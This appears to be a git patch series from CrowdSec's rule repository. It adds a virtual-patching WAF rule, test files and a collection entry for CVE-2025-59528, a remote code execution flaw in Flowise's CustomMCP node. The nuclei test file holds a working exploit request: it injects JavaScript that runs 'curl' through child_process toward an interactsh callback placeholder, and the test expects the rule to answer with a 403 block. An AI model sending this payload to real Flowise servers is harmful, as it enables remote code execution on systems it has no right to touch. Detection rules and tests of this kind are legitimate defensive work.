From 38b677d7f02ac5c18176afaabf1724a4179284ac Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 17 Jun 2026 12:34:08 +0200 Subject: [PATCH 1/5] Add vpatch-CVE-2025-59528 rule --- .../crowdsecurity/vpatch-CVE-2025-59528.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml new file mode 100644 index 00000000000..43e2c90d982 --- /dev/null +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml @@ -0,0 +1,34 @@ +## autogenerated on 2026-06-17 10:34:05 +name: crowdsecurity/vpatch-CVE-2025-59528 +description: 'Detects Flowise CustomMCP node RCE via unsafe evaluation in convertToValidJSONString.' +rules: + - and: + - zones: + - URI + transform: + - lowercase + match: + type: contains + value: /api/v1/node-load-method/custommcp + - zones: + - BODY_ARGS + variables: + - json.inputs.mcpserverconfig + transform: + - lowercase + - urldecode + match: + type: contains + value: 'function()' + +labels: + type: exploit + service: http + confidence: 3 + spoofable: 0 + behavior: 'http:exploit' + label: 'Flowise - RCE' + classification: + - cve.CVE-2025-59528 + - attack.T1190 + - cwe.CWE-94 From 0b010e465087bc883189f7cbf853435f905f1f09 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 17 Jun 2026 12:34:10 +0200 Subject: [PATCH 2/5] Add vpatch-CVE-2025-59528 test config --- .appsec-tests/vpatch-CVE-2025-59528/config.yaml | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2025-59528/config.yaml diff --git a/.appsec-tests/vpatch-CVE-2025-59528/config.yaml b/.appsec-tests/vpatch-CVE-2025-59528/config.yaml new file mode 100644 index 00000000000..5a1ed50e5f9 --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2025-59528/config.yaml @@ -0,0 +1,5 @@ +## autogenerated on 2026-06-17 10:34:05 +appsec-rules: + - ./appsec-rules/crowdsecurity/base-config.yaml + - ./appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml +nuclei_template: CVE-2025-59528.yaml From e47a22313a1a3dffd45f6897225165f3d67a43a3 Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 17 Jun 2026 12:34:12 +0200 Subject: [PATCH 3/5] Add CVE-2025-59528.yaml test --- .../vpatch-CVE-2025-59528/CVE-2025-59528.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 .appsec-tests/vpatch-CVE-2025-59528/CVE-2025-59528.yaml diff --git a/.appsec-tests/vpatch-CVE-2025-59528/CVE-2025-59528.yaml b/.appsec-tests/vpatch-CVE-2025-59528/CVE-2025-59528.yaml new file mode 100644 index 00000000000..4d08c7d543a --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2025-59528/CVE-2025-59528.yaml @@ -0,0 +1,22 @@ +## autogenerated on 2026-06-17 10:34:05 +id: CVE-2025-59528 +info: + name: CVE-2025-59528 + author: crowdsec + severity: info + description: CVE-2025-59528 testing + tags: appsec-testing +http: + - raw: + - | + POST /api/v1/node-load-method/customMCP HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + x-request-from: internal + + {"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.execSync(\"curl {{interactsh-url}}\");return 1;})()})"}} + cookie-reuse: true + matchers: + - type: status + status: + - 403 From 21e624917438444e556be08ed56a0f409162aafc Mon Sep 17 00:00:00 2001 From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com> Date: Wed, 17 Jun 2026 12:34:14 +0200 Subject: [PATCH 4/5] Add vpatch-CVE-2025-59528 rule to vpatch collection --- collections/crowdsecurity/appsec-virtual-patching.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml index c4f95a425d8..2e5b652e210 100644 --- a/collections/crowdsecurity/appsec-virtual-patching.yaml +++ b/collections/crowdsecurity/appsec-virtual-patching.yaml @@ -130,6 +130,7 @@ appsec-rules: - crowdsecurity/vpatch-CVE-2022-31499 - crowdsecurity/vpatch-CVE-2025-57819 - crowdsecurity/vpatch-CVE-2018-1207 +- crowdsecurity/vpatch-CVE-2025-59528 - crowdsecurity/vpatch-CVE-2024-46506 - crowdsecurity/vpatch-CVE-2025-3605 - crowdsecurity/vpatch-CVE-2024-29028 From 86c95fa2d21493e0f1cd09996bfab85310368d7e Mon Sep 17 00:00:00 2001 From: "Thibault \"bui\" Koechlin" Date: Wed, 17 Jun 2026 15:14:10 +0200 Subject: [PATCH 5/5] Update vpatch-CVE-2025-59528.yaml --- appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml index 43e2c90d982..2a3719d2567 100644 --- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-59528.yaml @@ -19,7 +19,7 @@ rules: - urldecode match: type: contains - value: 'function()' + value: 'function(' labels: type: exploit